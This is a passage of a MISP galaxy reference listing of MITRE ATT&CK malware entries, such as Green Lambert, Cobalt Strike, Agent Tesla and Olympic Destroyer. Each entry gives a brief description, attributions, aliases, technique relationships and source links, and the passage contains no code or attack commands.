[Green Lambert](https://attack.mitre.org/software/S0690) is a modular backdoor that security researchers assess has been used by an advanced threat group referred to as Longhorn and The Lamberts. First reported in 2017, the Windows variant of [Green Lambert](https://attack.mitre.org/software/S0690) may have been used as early as 2008; a macOS version was uploaded to a multiscanner service in September 2014.(Citation: Kaspersky Lamberts Toolkit April 2017)(Citation: Objective See Green Lambert for OSX Oct 2021)

The tag is: misp-galaxy:mitre-malware="Green Lambert - S0690"

Green Lambert - S0690 is also known as:

  • Green Lambert

Table 7184. Table References

Links

https://attack.mitre.org/software/S0690

https://objective-see.com/blog/blog_0x68.html

https://securelist.com/unraveling-the-lamberts-toolkit/77990/

Saint Bot - S1018

[Saint Bot](https://attack.mitre.org/software/S1018) is a .NET downloader that has been used by [Ember Bear](https://attack.mitre.org/groups/G1003) since at least March 2021.(Citation: Malwarebytes Saint Bot April 2021)(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )

The tag is: misp-galaxy:mitre-malware="Saint Bot - S1018"

Table 7185. Table References

Links

https://attack.mitre.org/software/S1018

https://blog.malwarebytes.com/threat-intelligence/2021/04/a-deep-dive-into-saint-bot-downloader/

https://unit42.paloaltonetworks.com/ukraine-targeted-outsteel-saintbot/

Heyoka Backdoor - S1027

[Heyoka Backdoor](https://attack.mitre.org/software/S1027) is a custom backdoor—​based on the Heyoka open source exfiltration tool—​that has been used by [Aoqin Dragon](https://attack.mitre.org/groups/G1007) since at least 2013.(Citation: SentinelOne Aoqin Dragon June 2022)(Citation: Sourceforge Heyoka 2022)

The tag is: misp-galaxy:mitre-malware="Heyoka Backdoor - S1027"

Heyoka Backdoor - S1027 is also known as:

  • Heyoka Backdoor

Table 7186. Table References

Links

https://attack.mitre.org/software/S1027

https://heyoka.sourceforge.net/

https://www.sentinelone.com/labs/aoqin-dragon-newly-discovered-chinese-linked-apt-has-been-quietly-spying-on-organizations-for-10-years/

Action RAT - S1028

[Action RAT](https://attack.mitre.org/software/S1028) is a remote access tool written in Delphi that has been used by [SideCopy](https://attack.mitre.org/groups/G1008) since at least December 2021 against Indian and Afghani government personnel.(Citation: MalwareBytes SideCopy Dec 2021)

The tag is: misp-galaxy:mitre-malware="Action RAT - S1028"

Action RAT - S1028 is also known as:

  • Action RAT

Table 7187. Table References

Links

https://attack.mitre.org/software/S1028

https://www.malwarebytes.com/blog/news/2021/12/sidecopy-apt-connecting-lures-to-victims-payloads-to-infrastructure

AutoIt backdoor - S0129

[AutoIt backdoor](https://attack.mitre.org/software/S0129) is malware that has been used by the actors responsible for the MONSOON campaign. The actors frequently used it in weaponized .pps files exploiting CVE-2014-6352. (Citation: Forcepoint Monsoon) This malware makes use of the legitimate scripting language for Windows GUI automation with the same name.

The tag is: misp-galaxy:mitre-malware="AutoIt backdoor - S0129"

AutoIt backdoor - S0129 is also known as:

  • AutoIt backdoor

AutoIt backdoor - S0129 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1088" with estimative-language:likelihood-probability="almost-certain"

Table 7188. Table References

Links

https://attack.mitre.org/software/S0129

https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf

AuTo Stealer - S1029

[AuTo Stealer](https://attack.mitre.org/software/S1029) is malware written in C++ has been used by [SideCopy](https://attack.mitre.org/groups/G1008) since at least December 2021 to target government agencies and personnel in India and Afghanistan.(Citation: MalwareBytes SideCopy Dec 2021)

The tag is: misp-galaxy:mitre-malware="AuTo Stealer - S1029"

AuTo Stealer - S1029 is also known as:

  • AuTo Stealer

Table 7189. Table References

Links

https://attack.mitre.org/software/S1029

https://www.malwarebytes.com/blog/news/2021/12/sidecopy-apt-connecting-lures-to-victims-payloads-to-infrastructure

Agent Tesla - S0331

[Agent Tesla](https://attack.mitre.org/software/S0331) is a spyware Trojan written for the .NET framework that has been observed since at least 2014.(Citation: Fortinet Agent Tesla April 2018)(Citation: Bitdefender Agent Tesla April 2020)(Citation: Malwarebytes Agent Tesla April 2020)

The tag is: misp-galaxy:mitre-malware="Agent Tesla - S0331"

Agent Tesla - S0331 is also known as:

  • Agent Tesla

Table 7190. Table References

Links

https://attack.mitre.org/software/S0331

https://blog.malwarebytes.com/threat-analysis/2020/04/new-agenttesla-variant-steals-wifi-credentials/

https://blog.talosintelligence.com/2018/10/old-dog-new-tricks-analysing-new-rtf_15.html

https://labs.bitdefender.com/2020/04/oil-gas-spearphishing-campaigns-drop-agent-tesla-spyware-in-advance-of-historic-opec-deal/

https://www.digitrustgroup.com/agent-tesla-keylogger/

https://www.fortinet.com/blog/threat-research/analysis-of-new-agent-tesla-spyware-variant.html

Small Sieve - S1035

[Small Sieve](https://attack.mitre.org/software/S1035) is a Telegram Bot API-based Python backdoor that has been distributed using a Nullsoft Scriptable Install System (NSIS) Installer; it has been used by [MuddyWater](https://attack.mitre.org/groups/G0069) since at least January 2022.(Citation: DHS CISA AA22-055A MuddyWater February 2022)(Citation: NCSC GCHQ Small Sieve Jan 2022)

Security researchers have also noted [Small Sieve](https://attack.mitre.org/software/S1035)'s use by UNC3313, which may be associated with [MuddyWater](https://attack.mitre.org/groups/G0069).(Citation: Mandiant UNC3313 Feb 2022)

The tag is: misp-galaxy:mitre-malware="Small Sieve - S1035"

Small Sieve - S1035 is also known as:

  • Small Sieve

  • GRAMDOOR

Table 7191. Table References

Links

https://attack.mitre.org/software/S1035

https://www.cisa.gov/uscert/ncas/alerts/aa22-055a

https://www.mandiant.com/resources/telegram-malware-iranian-espionage

https://www.ncsc.gov.uk/files/NCSC-Malware-Analysis-Report-Small-Sieve.pdf

Cobalt Strike - S0154

[Cobalt Strike](https://attack.mitre.org/software/S0154) is a commercial, full-featured, remote access tool that bills itself as “adversary simulation software designed to execute targeted attacks and emulate the post-exploitation actions of advanced threat actors”. Cobalt Strike’s interactive post-exploit capabilities cover the full range of ATT&CK tactics, all executed within a single, integrated system.(Citation: cobaltstrike manual)

In addition to its own capabilities, [Cobalt Strike](https://attack.mitre.org/software/S0154) leverages the capabilities of other well-known tools such as Metasploit and [Mimikatz](https://attack.mitre.org/software/S0002).(Citation: cobaltstrike manual)

The tag is: misp-galaxy:mitre-malware="Cobalt Strike - S0154"

Cobalt Strike - S0154 is also known as:

  • Cobalt Strike

Table 7192. Table References

Links

https://attack.mitre.org/software/S0154

https://web.archive.org/web/20210825130434/https://cobaltstrike.com/downloads/csmanual38.pdf

Ragnar Locker - S0481

[Ragnar Locker](https://attack.mitre.org/software/S0481) is a ransomware that has been in use since at least December 2019.(Citation: Sophos Ragnar May 2020)(Citation: Cynet Ragnar Apr 2020)

The tag is: misp-galaxy:mitre-malware="Ragnar Locker - S0481"

Ragnar Locker - S0481 is also known as:

  • Ragnar Locker

Ragnar Locker - S0481 has relationships with:

  • similar: misp-galaxy:ransomware="Ragnar Locker" with estimative-language:likelihood-probability="likely"

Table 7193. Table References

Links

https://attack.mitre.org/software/S0481

https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/

https://www.cynet.com/blog/cynet-detection-report-ragnar-locker-ransomware/

Woody RAT - S1065

[Woody RAT](https://attack.mitre.org/software/S1065) is a remote access trojan (RAT) that has been used since at least August 2021 against Russian organizations.(Citation: MalwareBytes WoodyRAT Aug 2022)

The tag is: misp-galaxy:mitre-malware="Woody RAT - S1065"

Woody RAT - S1065 is also known as:

  • Woody RAT

Table 7194. Table References

Links

https://attack.mitre.org/software/S1065

https://www.malwarebytes.com/blog/threat-intelligence/2022/08/woody-rat-a-new-feature-rich-malware-spotted-in-the-wild

SYNful Knock - S0519

[SYNful Knock](https://attack.mitre.org/software/S0519) is a stealthy modification of the operating system of network devices that can be used to maintain persistence within a victim’s network and provide new capabilities to the adversary.(Citation: Mandiant - Synful Knock)(Citation: Cisco Synful Knock Evolution)

The tag is: misp-galaxy:mitre-malware="SYNful Knock - S0519"

SYNful Knock - S0519 is also known as:

  • SYNful Knock

Table 7195. Table References

Links

https://attack.mitre.org/software/S0519

https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices

https://www.mandiant.com/resources/synful-knock-acis

Power Loader - S0177

[Power Loader](https://attack.mitre.org/software/S0177) is modular code sold in the cybercrime market used as a downloader in malware families such as Carberp, Redyms and Gapz. (Citation: MalwareTech Power Loader Aug 2013) (Citation: WeLiveSecurity Gapz and Redyms Mar 2013)

The tag is: misp-galaxy:mitre-malware="Power Loader - S0177"

Power Loader - S0177 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Extra Window Memory Injection - T1181" with estimative-language:likelihood-probability="almost-certain"

Table 7196. Table References

Links

https://attack.mitre.org/software/S0177

https://www.malwaretech.com/2013/08/powerloader-injection-something-truly.html

https://www.welivesecurity.com/2013/03/19/gapz-and-redyms-droppers-based-on-power-loader-code/

Brave Prince - S0252

[Brave Prince](https://attack.mitre.org/software/S0252) is a Korean-language implant that was first observed in the wild in December 2017. It contains similar code and behavior to [Gold Dragon](https://attack.mitre.org/software/S0249), and was seen along with [Gold Dragon](https://attack.mitre.org/software/S0249) and [RunningRAT](https://attack.mitre.org/software/S0253) in operations surrounding the 2018 Pyeongchang Winter Olympics. (Citation: McAfee Gold Dragon)

The tag is: misp-galaxy:mitre-malware="Brave Prince - S0252"

Brave Prince - S0252 is also known as:

  • Brave Prince

Table 7197. Table References

Links

https://attack.mitre.org/software/S0252

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/

Smoke Loader - S0226

[Smoke Loader](https://attack.mitre.org/software/S0226) is a malicious bot application that can be used to load other malware. [Smoke Loader](https://attack.mitre.org/software/S0226) has been seen in the wild since at least 2011 and has included a number of different payloads. It is notorious for its use of deception and self-protection. It also comes with several plug-ins. (Citation: Malwarebytes SmokeLoader 2016) (Citation: Microsoft Dofoil 2018)

The tag is: misp-galaxy:mitre-malware="Smoke Loader - S0226"

Smoke Loader - S0226 is also known as:

  • Smoke Loader

  • Dofoil

Smoke Loader - S0226 has relationships with:

  • similar: misp-galaxy:tool="Smoke Loader" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="SmokeLoader" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Supply Chain Compromise - T1195" with estimative-language:likelihood-probability="almost-certain"

Table 7198. Table References

Links

https://attack.mitre.org/software/S0226

https://blog.malwarebytes.com/threat-analysis/2016/08/smoke-loader-downloader-with-a-smokescreen-still-alive/

https://cloudblogs.microsoft.com/microsoftsecure/2018/03/07/behavior-monitoring-combined-with-machine-learning-spoils-a-massive-dofoil-coin-mining-campaign/

Linux Rabbit - S0362

[Linux Rabbit](https://attack.mitre.org/software/S0362) is malware that targeted Linux servers and IoT devices in a campaign lasting from August to October 2018. It shares code with another strain of malware known as Rabbot. The goal of the campaign was to install cryptocurrency miners onto the targeted servers and devices.(Citation: Anomali Linux Rabbit 2018)

The tag is: misp-galaxy:mitre-malware="Linux Rabbit - S0362"

Linux Rabbit - S0362 is also known as:

  • Linux Rabbit

Table 7199. Table References

Links

https://attack.mitre.org/software/S0362

https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat

Stealth Mango - S0328

[Stealth Mango](https://attack.mitre.org/software/S0328) is Android malware that has reportedly been used to successfully compromise the mobile devices of government officials, members of the military, medical professionals, and civilians. The iOS malware known as [Tangelo](https://attack.mitre.org/software/S0329) is believed to be from the same developer. (Citation: Lookout-StealthMango)

The tag is: misp-galaxy:mitre-malware="Stealth Mango - S0328"

Stealth Mango - S0328 is also known as:

  • Stealth Mango

Table 7200. Table References

Links

https://attack.mitre.org/software/S0328

https://info.lookout.com/rs/051-ESQ-475/images/lookout-stealth-mango-srr-us.pdf

Corona Updates - S0425

[Corona Updates](https://attack.mitre.org/software/S0425) is Android spyware that took advantage of the Coronavirus pandemic. The campaign distributing this spyware is tracked as Project Spy. Multiple variants of this spyware have been discovered to have been hosted on the Google Play Store.(Citation: TrendMicro Coronavirus Updates)

The tag is: misp-galaxy:mitre-malware="Corona Updates - S0425"

Corona Updates - S0425 is also known as:

  • Corona Updates

  • Wabi Music

  • Concipit1248

Table 7201. Table References

Links

https://attack.mitre.org/software/S0425

https://blog.trendmicro.com/trendlabs-security-intelligence/coronavirus-update-app-leads-to-project-spy-android-and-ios-spyware/

Gold Dragon - S0249

[Gold Dragon](https://attack.mitre.org/software/S0249) is a Korean-language, data gathering implant that was first observed in the wild in South Korea in July 2017. [Gold Dragon](https://attack.mitre.org/software/S0249) was used along with [Brave Prince](https://attack.mitre.org/software/S0252) and [RunningRAT](https://attack.mitre.org/software/S0253) in operations targeting organizations associated with the 2018 Pyeongchang Winter Olympics. (Citation: McAfee Gold Dragon)

The tag is: misp-galaxy:mitre-malware="Gold Dragon - S0249"

Gold Dragon - S0249 is also known as:

  • Gold Dragon

Table 7202. Table References

Links

https://attack.mitre.org/software/S0249

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/

Caterpillar WebShell - S0572

[Caterpillar WebShell](https://attack.mitre.org/software/S0572) is a self-developed Web Shell tool created by the group [Volatile Cedar](https://attack.mitre.org/groups/G0123).(Citation: ClearSky Lebanese Cedar Jan 2021)

The tag is: misp-galaxy:mitre-malware="Caterpillar WebShell - S0572"

Caterpillar WebShell - S0572 is also known as:

  • Caterpillar WebShell

Table 7203. Table References

Links

https://attack.mitre.org/software/S0572

https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2015/03/20082004/volatile-cedar-technical-report.pdf

https://www.clearskysec.com/wp-content/uploads/2021/01/Lebanese-Cedar-APT.pdf

Cobian RAT - S0338

[Cobian RAT](https://attack.mitre.org/software/S0338) is a backdoor, remote access tool that has been observed since 2016.(Citation: Zscaler Cobian Aug 2017)

The tag is: misp-galaxy:mitre-malware="Cobian RAT - S0338"

Cobian RAT - S0338 is also known as:

  • Cobian RAT

Table 7204. Table References

Links

https://attack.mitre.org/software/S0338

https://www.zscaler.com/blogs/research/cobian-rat-backdoored-rat

Cardinal RAT - S0348

[Cardinal RAT](https://attack.mitre.org/software/S0348) is a potentially low volume remote access trojan (RAT) observed since December 2015. [Cardinal RAT](https://attack.mitre.org/software/S0348) is notable for its unique utilization of uncompiled C# source code and the Microsoft Windows built-in csc.exe compiler.(Citation: PaloAlto CardinalRat Apr 2017)

The tag is: misp-galaxy:mitre-malware="Cardinal RAT - S0348"

Cardinal RAT - S0348 is also known as:

  • Cardinal RAT

Table 7205. Table References

Links

https://attack.mitre.org/software/S0348

https://researchcenter.paloaltonetworks.com/2017/04/unit42-cardinal-rat-active-two-years/

Golden Cup - S0535

[Golden Cup](https://attack.mitre.org/software/S0535) is Android spyware that has been used to target World Cup fans.(Citation: Symantec GoldenCup)

The tag is: misp-galaxy:mitre-malware="Golden Cup - S0535"

Golden Cup - S0535 is also known as:

  • Golden Cup

Table 7206. Table References

Links

https://attack.mitre.org/software/S0535

https://symantec-enterprise-blogs.security.com/blogs/expert-perspectives/goldencup-new-cyber-threat-targeting-world-cup-fans

Olympic Destroyer - S0365

[Olympic Destroyer](https://attack.mitre.org/software/S0365) is malware that was used by [Sandworm Team](https://attack.mitre.org/groups/G0034) against the 2018 Winter Olympics, held in Pyeongchang, South Korea. The main purpose of the malware was to render infected computer systems inoperable. The malware leverages various native Windows utilities and API calls to carry out its destructive tasks. [Olympic Destroyer](https://attack.mitre.org/software/S0365) has worm-like features to spread itself across a computer network in order to maximize its destructive impact.(Citation: Talos Olympic Destroyer 2018)(Citation: US District Court Indictment GRU Unit 74455 October 2020)

The tag is: misp-galaxy:mitre-malware="Olympic Destroyer - S0365"

Olympic Destroyer - S0365 is also known as:

  • Olympic Destroyer

Table 7207. Table References

Links

https://attack.mitre.org/software/S0365

https://blog.talosintelligence.com/2018/02/olympic-destroyer.html

https://www.justice.gov/opa/press-release/file/1328521/download

Revenge RAT - S0379

[Revenge RAT](https://attack.mitre.org/software/S0379) is a freely available remote access tool written in .NET (C#).(Citation: Cylance Shaheen Nov 2018)(Citation: Cofense RevengeRAT Feb 2019)

The tag is: misp-galaxy:mitre-malware="Revenge RAT - S0379"

Revenge RAT - S0379 is also known as:

  • Revenge RAT

Table 7208. Table References

Links

https://attack.mitre.org/software/S0379

https://cofense.com/upgrades-delivery-support-infrastructure-revenge-rat-malware-bigger-threat/

https://www.cylance.com/content/dam/cylance-web/en-us/resources/knowledge-center/resource-library/reports/WhiteCompanyOperationShaheenReport.pdf?_ga=2.161661948.1943296560.1555683782-1066572390.1555511517

Rising Sun - S0448

[Rising Sun](https://attack.mitre.org/software/S0448) is a modular backdoor that was used extensively in [Operation Sharpshooter](https://attack.mitre.org/campaigns/C0013) between 2017 and 2019. [Rising Sun](https://attack.mitre.org/software/S0448) infected at least 87 organizations around the world, including nuclear, defense, energy, and financial service companies. Security researchers assessed [Rising Sun](https://attack.mitre.org/software/S0448) included some source code from [Lazarus Group](https://attack.mitre.org/groups/G0032)'s Trojan Duuzer.(Citation: McAfee Sharpshooter December 2018)

The tag is: misp-galaxy:mitre-malware="Rising Sun - S0448"

Rising Sun - S0448 is also known as:

  • Rising Sun

Table 7209. Table References

Links

https://attack.mitre.org/software/S0448

https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-sharpshooter.pdf

JSS Loader - S0648

[JSS Loader](https://attack.mitre.org/software/S0648) is Remote Access Trojan (RAT) with .NET and C++ variants that has been used by [FIN7](https://attack.mitre.org/groups/G0046) since at least 2020.(Citation: eSentire FIN7 July 2021)(Citation: CrowdStrike Carbon Spider August 2021)

The tag is: misp-galaxy:mitre-malware="JSS Loader - S0648"

JSS Loader - S0648 is also known as:

  • JSS Loader

Table 7210. Table References

Links

https://attack.mitre.org/software/S0648

https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/

https://www.esentire.com/security-advisories/notorious-cybercrime-gang-fin7-lands-malware-in-law-firm-using-fake-legal-complaint-against-jack-daniels-owner-brown-forman-inc

DEFENSOR ID - S0479

[DEFENSOR ID](https://attack.mitre.org/software/S0479) is a banking trojan capable of clearing a victim’s bank account or cryptocurrency wallet and taking over email or social media accounts. [DEFENSOR ID](https://attack.mitre.org/software/S0479) performs the majority of its malicious functionality by abusing Android’s accessibility service.(Citation: ESET DEFENSOR ID)

The tag is: misp-galaxy:mitre-malware="DEFENSOR ID - S0479"

DEFENSOR ID - S0479 is also known as:

  • DEFENSOR ID

Table 7211. Table References

Links

https://attack.mitre.org/software/S0479

https://www.welivesecurity.com/2020/05/22/insidious-android-malware-gives-up-all-malicious-features-but-one-gain-stealth/

Tiktok Pro - S0558

[Tiktok Pro](https://attack.mitre.org/software/S0558) is spyware that has been masquerading as the TikTok application.(Citation: Zscaler TikTok Spyware)

The tag is: misp-galaxy:mitre-malware="Tiktok Pro - S0558"

Tiktok Pro - S0558 is also known as:

  • Tiktok Pro

Table 7212. Table References

Links

https://attack.mitre.org/software/S0558

https://www.zscaler.com/blogs/security-research/tiktok-spyware

[Cyclops Blink](https://attack.mitre.org/software/S0687) is a modular malware that has been used in widespread campaigns by [Sandworm Team](https://attack.mitre.org/groups/G0034) since at least 2019 to target Small/Home Office (SOHO) network devices, including WatchGuard and Asus.(Citation: NCSC Cyclops Blink February 2022)(Citation: NCSC CISA Cyclops Blink Advisory February 2022)(Citation: Trend Micro Cyclops Blink March 2022)

The tag is: misp-galaxy:mitre-malware="Cyclops Blink - S0687"

Cyclops Blink - S0687 is also known as:

  • Cyclops Blink

Table 7213. Table References

Links

https://attack.mitre.org/software/S0687

https://www.ncsc.gov.uk/files/Cyclops-Blink-Malware-Analysis-Report.pdf

https://www.ncsc.gov.uk/news/joint-advisory-shows-new-sandworm-malware-cyclops-blink-replaces-vpnfilter

https://www.trendmicro.com/en_us/research/22/c/cyclops-blink-sets-sights-on-asus-routers--.html

Trojan-SMS.AndroidOS.FakeInst.a - S0306

[Trojan-SMS.AndroidOS.FakeInst.a](https://attack.mitre.org/software/S0306) is Android malware. (Citation: Kaspersky-MobileMalware)

The tag is: misp-galaxy:mitre-malware="Trojan-SMS.AndroidOS.FakeInst.a - S0306"

Trojan-SMS.AndroidOS.FakeInst.a - S0306 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Application Layer Protocol - T1437" with estimative-language:likelihood-probability="almost-certain"

Table 7214. Table References

Links

https://attack.mitre.org/software/S0306

https://securelist.com/mobile-malware-evolution-2013/58335/

Trojan-SMS.AndroidOS.Agent.ao - S0307

[Trojan-SMS.AndroidOS.Agent.ao](https://attack.mitre.org/software/S0307) is Android malware. (Citation: Kaspersky-MobileMalware)

The tag is: misp-galaxy:mitre-malware="Trojan-SMS.AndroidOS.Agent.ao - S0307"

Trojan-SMS.AndroidOS.Agent.ao - S0307 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Application Layer Protocol - T1437" with estimative-language:likelihood-probability="almost-certain"

Table 7215. Table References

Links

https://attack.mitre.org/software/S0307

https://securelist.com/mobile-malware-evolution-2013/58335/

Trojan-SMS.AndroidOS.OpFake.a - S0308

[Trojan-SMS.AndroidOS.OpFake.a](https://attack.mitre.org/software/S0308) is Android malware. (Citation: Kaspersky-MobileMalware)

The tag is: misp-galaxy:mitre-malware="Trojan-SMS.AndroidOS.OpFake.a - S0308"

Trojan-SMS.AndroidOS.OpFake.a - S0308 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Application Layer Protocol - T1437" with estimative-language:likelihood-probability="almost-certain"

Table 7216. Table References

Links

https://attack.mitre.org/software/S0308

https://securelist.com/mobile-malware-evolution-2013/58335/

Mis-Type - S0084

[Mis-Type](https://attack.mitre.org/software/S0084) is a backdoor hybrid that was used in [Operation Dust Storm](https://attack.mitre.org/campaigns/C0016) by 2012.(Citation: Cylance Dust Storm)

The tag is: misp-galaxy:mitre-malware="Mis-Type - S0084"

Mis-Type - S0084 is also known as:

  • Mis-Type

Mis-Type - S0084 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Application Layer Protocol - T1071" with estimative-language:likelihood-probability="almost-certain"

Table 7217. Table References

Links

https://attack.mitre.org/software/S0084

https://s7d2.scene7.com/is/content/cylance/prod/cylance-web/en-us/resources/knowledge-center/resource-library/reports/Op_Dust_Storm_Report.pdf

S-Type - S0085

[S-Type](https://attack.mitre.org/software/S0085) is a backdoor that was used in [Operation Dust Storm](https://attack.mitre.org/campaigns/C0016) since at least 2013.(Citation: Cylance Dust Storm)

The tag is: misp-galaxy:mitre-malware="S-Type - S0085"

S-Type - S0085 is also known as:

  • S-Type

S-Type - S0085 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Shortcut Modification - T1023" with estimative-language:likelihood-probability="almost-certain"

Table 7218. Table References

Links

https://attack.mitre.org/software/S0085

https://s7d2.scene7.com/is/content/cylance/prod/cylance-web/en-us/resources/knowledge-center/resource-library/reports/Op_Dust_Storm_Report.pdf

Hi-Zor - S0087

[Hi-Zor](https://attack.mitre.org/software/S0087) is a remote access tool (RAT) that has characteristics similar to [Sakula](https://attack.mitre.org/software/S0074). It was used in a campaign named INOCNATION. (Citation: Fidelis Hi-Zor)

The tag is: misp-galaxy:mitre-malware="Hi-Zor - S0087"

Hi-Zor - S0087 is also known as:

  • Hi-Zor

Hi-Zor - S0087 has relationships with:

  • similar: misp-galaxy:rat="Hi-Zor" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 7219. Table References

Links

https://attack.mitre.org/software/S0087

https://www.fidelissecurity.com/threatgeek/archive/introducing-hi-zor-rat/

Miner-C - S0133

[Miner-C](https://attack.mitre.org/software/S0133) is malware that mines victims for the Monero cryptocurrency. It has targeted FTP servers and Network Attached Storage (NAS) devices to spread. (Citation: Softpedia MinerC)

The tag is: misp-galaxy:mitre-malware="Miner-C - S0133"

Miner-C - S0133 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Taint Shared Content - T1080" with estimative-language:likelihood-probability="almost-certain"

Table 7220. Table References

Links

http://news.softpedia.com/news/cryptocurrency-mining-malware-discovered-targeting-seagate-nas-hard-drives-508119.shtml

https://attack.mitre.org/software/S0133

Seth-Locker - S0639

[Seth-Locker](https://attack.mitre.org/software/S0639) is a ransomware with some remote control capabilities that has been in use since at least 2021. (Citation: Trend Micro Ransomware February 2021)

The tag is: misp-galaxy:mitre-malware="Seth-Locker - S0639"

Seth-Locker - S0639 is also known as:

  • Seth-Locker

Table 7221. Table References

Links

https://attack.mitre.org/software/S0639

https://www.trendmicro.com/en_us/research/21/b/new-in-ransomware.html

Aria-body - S0456

[Aria-body](https://attack.mitre.org/software/S0456) is a custom backdoor that has been used by [Naikon](https://attack.mitre.org/groups/G0019) since approximately 2017.(Citation: CheckPoint Naikon May 2020)

The tag is: misp-galaxy:mitre-malware="Aria-body - S0456"

Aria-body - S0456 is also known as:

  • Aria-body

Table 7222. Table References

Links

https://attack.mitre.org/software/S0456

https://research.checkpoint.com/2020/naikon-apt-cyber-espionage-reloaded/

S.O.V.A. - S1062

[S.O.V.A.](https://attack.mitre.org/software/S1062) is an Android banking trojan that was first identified in August 2021 and has subsequently been found in a variety of applications, including banking, cryptocurrency wallet/exchange, and shopping apps. [S.O.V.A.](https://attack.mitre.org/software/S1062), which is Russian for "owl", contains features not commonly found in Android malware, such as session cookie theft.(Citation: threatfabric_sova_0921)(Citation: cleafy_sova_1122)

The tag is: misp-galaxy:mitre-malware="S.O.V.A. - S1062"

S.O.V.A. - S1062 is also known as:

  • S.O.V.A.

Table 7223. Table References

Links

https://attack.mitre.org/software/S1062

https://www.cleafy.com/cleafy-labs/sova-malware-is-back-and-is-evolving-rapidly

https://www.threatfabric.com/blogs/sova-new-trojan-with-fowl-intentions.html

Android/Chuli.A - S0304

[Android/Chuli.A](https://attack.mitre.org/software/S0304) is Android malware that was delivered to activist groups via a spearphishing email with an attachment. (Citation: Kaspersky-WUC)

The tag is: misp-galaxy:mitre-malware="Android/Chuli.A - S0304"

Android/Chuli.A - S0304 is also known as:

  • Android/Chuli.A

Android/Chuli.A - S0304 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="App Delivered via Email Attachment - T1434" with estimative-language:likelihood-probability="almost-certain"

  • uses: misp-galaxy:mitre-attack-pattern="Deliver Malicious App via Other Means - T1476" with estimative-language:likelihood-probability="almost-certain"

Table 7224. Table References

Links

https://attack.mitre.org/software/S0304

https://securelist.com/android-trojan-found-in-targeted-attack-58/35552/

AndroidOS/MalLocker.B - S0524

[AndroidOS/MalLocker.B](https://attack.mitre.org/software/S0524) is a variant of a ransomware family targeting Android devices. It prevents the user from interacting with the UI by displaying a screen containing a ransom note over all other windows. (Citation: Microsoft MalLockerB)

The tag is: misp-galaxy:mitre-malware="AndroidOS/MalLocker.B - S0524"

AndroidOS/MalLocker.B - S0524 is also known as:

  • AndroidOS/MalLocker.B

Table 7225. Table References

Links

https://attack.mitre.org/software/S0524

https://www.microsoft.com/security/blog/2020/10/08/sophisticated-new-android-malware-marks-the-latest-evolution-of-mobile-ransomware/

Android/AdDisplay.Ashas - S0525

[Android/AdDisplay.Ashas](https://attack.mitre.org/software/S0525) is a variant of adware that has been distributed through multiple apps in the Google Play Store. (Citation: WeLiveSecurity AdDisplayAshas)

The tag is: misp-galaxy:mitre-malware="Android/AdDisplay.Ashas - S0525"

Android/AdDisplay.Ashas - S0525 is also known as:

  • Android/AdDisplay.Ashas

Table 7226. Table References

Links

https://attack.mitre.org/software/S0525

https://www.welivesecurity.com/2019/10/24/tracking-down-developer-android-adware/

Trojan.Mebromi - S0001

[Trojan.Mebromi](https://attack.mitre.org/software/S0001) is BIOS-level malware that takes control of the victim before MBR. (Citation: Ge 2011)

The tag is: misp-galaxy:mitre-malware="Trojan.Mebromi - S0001"

Trojan.Mebromi - S0001 is also known as:

  • Trojan.Mebromi

Trojan.Mebromi - S0001 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="System Firmware - T1019" with estimative-language:likelihood-probability="almost-certain"

Table 7227. Table References

Links

http://www.symantec.com/connect/blogs/bios-threat-showing-again

https://attack.mitre.org/software/S0001

ANDROIDOS_ANSERVER.A - S0310

[ANDROIDOS_ANSERVER.A](https://attack.mitre.org/software/S0310) is Android malware that is unique because it uses encrypted content within a blog site for command and control. (Citation: TrendMicro-Anserver)

The tag is: misp-galaxy:mitre-malware="ANDROIDOS_ANSERVER.A - S0310"

ANDROIDOS_ANSERVER.A - S0310 is also known as:

  • ANDROIDOS_ANSERVER.A

ANDROIDOS_ANSERVER.A - S0310 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Application Layer Protocol - T1437" with estimative-language:likelihood-probability="almost-certain"

  • uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1426" with estimative-language:likelihood-probability="almost-certain"

Table 7228. Table References

Links

http://blog.trendmicro.com/trendlabs-security-intelligence/android-malware-uses-blog-posts-as-cc/

https://attack.mitre.org/software/S0310

Agent.btz - S0092

[Agent.btz](https://attack.mitre.org/software/S0092) is a worm that primarily spreads itself via removable devices such as USB drives. It reportedly infected U.S. military networks in 2008. (Citation: Securelist Agent.btz)

The tag is: misp-galaxy:mitre-malware="Agent.btz - S0092"

Agent.btz - S0092 is also known as:

  • Agent.btz

Agent.btz - S0092 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 7229. Table References

Links

https://attack.mitre.org/software/S0092

https://securelist.com/agent-btz-a-source-of-inspiration/58551/

Backdoor.Oldrea - S0093

